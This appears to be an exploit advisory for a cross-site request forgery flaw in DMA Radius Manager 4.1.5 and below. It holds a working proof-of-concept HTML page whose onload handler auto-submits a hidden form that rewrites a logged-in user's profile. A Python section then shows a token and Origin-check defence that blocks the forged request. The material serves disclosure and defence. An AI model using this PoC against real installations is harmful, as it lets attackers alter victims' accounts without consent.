DMA Radius Manager versions 4.1.5 and below suffer from a cross site request forgery vulnerability.
<!--
# Exploit Title: DMA Radius Manager <= 4.1.5 CSRF (Edit Account)
# Exploit Author: bl4ck_mohajem
# Vendor Homepage: http://yonacms.com
# Version: 4.1.5
# Overview
DMA Radius Manager is an easy-to-use administration system for
Mikrotik, Cisco, StarOS, Chillispot, DD-WRT and pfSense NAS devices and
DOCSIS CMTS. It provides centralized authentication, accounting and
billing functions.
CSRF PoC Code
=============
The account-edit handler (user.php?cont=update_user) accepts the POST
below with nothing but the victim's session cookie: no anti-CSRF token
and no Origin/Referer check. A logged-in user who opens the attacker's
page has the form auto-submitted by the onload handler and the profile
fields (name, address, phone, e-mail, SMS alert flag, ...) overwritten
with attacker-chosen values. Replace 127.0.0.1 with the target host.
-->
<html>
<body onload="document.csrf.submit()">
<form name="csrf"
action="http://127.0.0.1/user.php?cont=update_user" method="post">
<input name="firstname" type="hidden" value="Name">
<input name="lastname" type="hidden" value="Family">
<input name="address" type="hidden" value="IRan">
<input name="city" type="hidden" value="IRAN">
<input name="zip" type="hidden" value="010101">
<input name="country" type="hidden" value="Albania">
<input name="state" type="hidden" value="Alabama">
<input name="phone" type="hidden" value="00000000">
<input name="mobile" type="hidden" value="000000000">
<input name="email" type="hidden" value="">
<input name="company" type="hidden" value="">
<input name="taxid" type="hidden" value="">
<input name="lang" type="hidden" value="English">
<input name="alertsms" type="hidden" value="1">
</form>
</body>
</html>
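The fix the vendor's handler lacks, shown as an added example written for this page (it is not DMA Radius Manager code, whose server side is PHP and is not reproduced in the advisory): a synchronizer token bound to the session plus an Origin/Referer check, applied to a request shaped like the PoC above. `APP_ORIGIN`, the `Request` class, `csrf_token` and the `update_user`/`csrf_check` helpers are assumptions made for the example; the field names `firstname`, `lastname`, `alertsms` and the `update_user` path come from the PoC form.

```python
# Added example, not from the advisory or the vendor: minimal server-side
# CSRF defence for an "edit account" POST handler like user.php?cont=update_user.
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import urlsplit

APP_ORIGIN = "http://127.0.0.1"  # hypothetical: scheme://host serving user.php


@dataclass
class Request:
    """Hypothetical request shape: method, path, header dict, parsed form dict."""
    method: str
    path: str
    headers: dict
    form: dict


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session synchronizer token and store it server-side.
    The genuine edit-account page embeds it as a hidden input; an attacker's
    page cannot read it, so a forged form cannot include it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is the app
    itself. A state-changing POST carrying neither header is rejected."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == APP_ORIGIN


def csrf_check(request: Request, session: dict) -> tuple:
    """Return (allowed, reason). Both the origin check and the token check must
    pass; the token comparison is constant-time."""
    if request.method.upper() != "POST":
        return False, "update_user must be a POST"
    if not origin_allowed(request.headers):
        return False, "cross-origin request"
    expected = session.get("csrf_token")
    supplied = request.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def update_user(request: Request, session: dict, account: dict) -> bool:
    """Apply the profile edit only when the CSRF check passes."""
    ok, _ = csrf_check(request, session)
    if not ok:
        return False
    for key in ("firstname", "lastname", "email", "mobile", "alertsms"):
        if key in request.form:
            account[key] = request.form[key]
    return True


def demo() -> dict:
    """Constructed traffic: the forged POST the PoC page emits (attacker origin,
    no token) versus a genuine submission from the real edit-account form."""
    session = {"user": "victim"}
    account = {"firstname": "Alice", "email": "alice@example.invalid"}
    token = issue_csrf_token(session)
    forged = Request("POST", "/user.php?cont=update_user",
                     {"Origin": "http://attacker.example"},
                     {"firstname": "Name", "lastname": "Family", "alertsms": "1"})
    genuine = Request("POST", "/user.php?cont=update_user",
                      {"Origin": APP_ORIGIN},
                      {"firstname": "Alice", "email": "alice@example.invalid",
                       "csrf_token": token})
    return {
        "forged_applied": update_user(forged, session, account),
        "forged_reason": csrf_check(forged, session)[1],
        "genuine_applied": update_user(genuine, session, account),
        "firstname_after": account["firstname"],
    }


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with `SameSite=Lax` (or `Strict`) stops the browser from attaching it to the auto-submitted cross-site POST in the first place, but the token check is what makes the handler safe on clients that do not honour that attribute.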
<!--
######################################################
#
# thanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky
############################################################
-->